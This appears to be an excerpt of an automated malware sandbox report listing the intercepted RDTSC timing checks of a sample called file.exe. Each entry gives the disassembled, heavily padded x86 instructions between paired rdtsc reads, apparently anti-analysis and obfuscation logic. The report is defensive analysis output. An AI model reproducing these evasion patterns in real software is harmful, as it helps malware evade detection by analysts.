              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1245EC9 second address: 1245EEF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6778CEBE46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6778CEBE58h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1245EEF second address: 1245EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1245EF5 second address: 1245EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124604E second address: 1246052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12461D6 second address: 12461EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6778CEBE4Bh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12461EA second address: 12461EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1246745 second address: 1246749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1246749 second address: 1246765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F67787C0190h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1246765 second address: 124678A instructions: 0x00000000 rdtsc 0x00000002 je 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F6778CEBE57h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120F806 second address: 120F80A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12468BC second address: 12468C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12470E9 second address: 12470ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12470ED second address: 12470F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124716E second address: 124717D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124717D second address: 12471F8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 1D6DDBC2h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F6778CEBE48h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D1AFEh] 0x0000002f mov esi, dword ptr [ebp+122D29F9h] 0x00000035 call 00007F6778CEBE49h 0x0000003a pushad 0x0000003b jmp 00007F6778CEBE4Dh 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 jmp 00007F6778CEBE56h 0x00000048 popad 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c push esi 0x0000004d ja 00007F6778CEBE46h 0x00000053 pop esi 0x00000054 push eax 0x00000055 push edx 0x00000056 jnp 00007F6778CEBE46h 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12471F8 second address: 1247229 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jno 00007F67787C0188h 0x00000012 pushad 0x00000013 je 00007F67787C0186h 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 jnl 00007F67787C0186h 0x00000029 popad 0x0000002a pushad 0x0000002b push edx 0x0000002c pop edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247DE6 second address: 1247DEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247DEA second address: 1247DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1247F45 second address: 1247F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1248087 second address: 1248092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F67787C0186h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12482F7 second address: 1248319 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d ja 00007F6778CEBE46h 0x00000013 pop edi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1248319 second address: 1248323 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F67787C018Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12491A8 second address: 12491AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124A46B second address: 124A46F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124A46F second address: 124A475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124AE78 second address: 124AE7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124AE7E second address: 124AEE6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f add esi, dword ptr [ebp+124613BDh] 0x00000015 push 00000000h 0x00000017 mov esi, dword ptr [ebp+122D2B61h] 0x0000001d mov esi, dword ptr [ebp+122D2AADh] 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F6778CEBE48h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f adc esi, 5FBA3C37h 0x00000045 jbe 00007F6778CEBE51h 0x0000004b jmp 00007F6778CEBE4Bh 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jbe 00007F6778CEBE4Ch 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124AEE6 second address: 124AEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B977 second address: 124B988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F6778CEBE4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B988 second address: 124B98C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B98C second address: 124B996 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6778CEBE4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B996 second address: 124B9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push edi 0x00000008 sub edi, dword ptr [ebp+122D3443h] 0x0000000e pop edi 0x0000000f mov di, dx 0x00000012 push 00000000h 0x00000014 or esi, dword ptr [ebp+122D29A5h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F67787C0188h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 mov esi, ebx 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a push ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B9D8 second address: 124B9E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124B9E1 second address: 124B9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D00B second address: 124D00F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D00F second address: 124D015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1251E63 second address: 1251E69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1251E69 second address: 1251E7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F67787C018Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1250FEB second address: 1250FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D883 second address: 124D889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1251F90 second address: 1251F96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D889 second address: 124D89C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F67787C0198h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 124D89C second address: 124D8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1253F71 second address: 1253FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 movsx edi, cx 0x00000009 push 00000000h 0x0000000b jmp 00007F67787C018Ah 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F67787C0188h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov ebx, dword ptr [ebp+122D2A05h] 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 push esi 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254FB9 second address: 1254FC7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254FC7 second address: 1254FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1254FCB second address: 1255008 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e pushad 0x0000000f adc di, E252h 0x00000014 call 00007F6778CEBE4Bh 0x00000019 pushad 0x0000001a popad 0x0000001b pop ecx 0x0000001c popad 0x0000001d mov dword ptr [ebp+1246FFACh], esi 0x00000023 push 00000000h 0x00000025 mov di, ax 0x00000028 push 00000000h 0x0000002a sub dword ptr [ebp+122D3827h], edi 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1255008 second address: 125500C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125500C second address: 1255012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1256FF1 second address: 12570A8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F67787C0190h 0x00000015 popad 0x00000016 pop edx 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F67787C0188h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 sub dword ptr [ebp+122D34F3h], esi 0x00000038 call 00007F67787C0193h 0x0000003d or bx, 9378h 0x00000042 pop ebx 0x00000043 push 00000000h 0x00000045 mov ebx, dword ptr [ebp+122D19AAh] 0x0000004b push 00000000h 0x0000004d push 00000000h 0x0000004f push edx 0x00000050 call 00007F67787C0188h 0x00000055 pop edx 0x00000056 mov dword ptr [esp+04h], edx 0x0000005a add dword ptr [esp+04h], 0000001Bh 0x00000062 inc edx 0x00000063 push edx 0x00000064 ret 0x00000065 pop edx 0x00000066 ret 0x00000067 js 00007F67787C0197h 0x0000006d jmp 00007F67787C0191h 0x00000072 xchg eax, esi 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F67787C018Bh 0x0000007a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12570A8 second address: 12570AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12570AD second address: 12570B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1259154 second address: 1259158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120555C second address: 1205562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1205562 second address: 1205581 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F6778CEBE46h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12596AE second address: 12596B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12596B2 second address: 12596B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1256251 second address: 1256257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1256257 second address: 125625B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B646 second address: 125B64C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125B64C second address: 125B650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12598BC second address: 12598C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125D963 second address: 125D9CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jmp 00007F6778CEBE4Eh 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 je 00007F6778CEBE48h 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007F6778CEBE48h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 00000018h 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+122D3182h], esi 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 pop edx 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125E8B5 second address: 125E927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0194h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F67787C0188h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 call 00007F67787C018Dh 0x0000002b mov di, 75CFh 0x0000002f pop edi 0x00000030 push 00000000h 0x00000032 jmp 00007F67787C0192h 0x00000037 push 00000000h 0x00000039 mov bl, F9h 0x0000003b xchg eax, esi 0x0000003c jo 00007F67787C018Eh 0x00000042 push esi 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F8BB second address: 125F8BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 125F8BF second address: 125F8D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F67787C0198h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1261956 second address: 126195A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126195A second address: 126196B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126476D second address: 126477D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F6778CEBE46h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12662F5 second address: 12662F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12662F9 second address: 126630B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6778CEBE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126630B second address: 126630F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126630F second address: 1266321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jnp 00007F6778CEBE56h 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1269791 second address: 12697AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0195h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C3E6 second address: 126C3F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C3F5 second address: 126C3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C3F9 second address: 126C3FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 126C3FD second address: 126C406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12701CB second address: 12701EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jbe 00007F6778CEBE46h 0x0000000f pop edi 0x00000010 pop ecx 0x00000011 jp 00007F6778CEBE71h 0x00000017 push eax 0x00000018 push edx 0x00000019 jne 00007F6778CEBE46h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127563F second address: 127565C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F67787C018Fh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127565C second address: 1275663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1279839 second address: 1279851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F67787C0191h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A2A0 second address: 127A2C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F6778CEBE48h 0x0000000e jnl 00007F6778CEBE56h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127A45D second address: 127A468 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
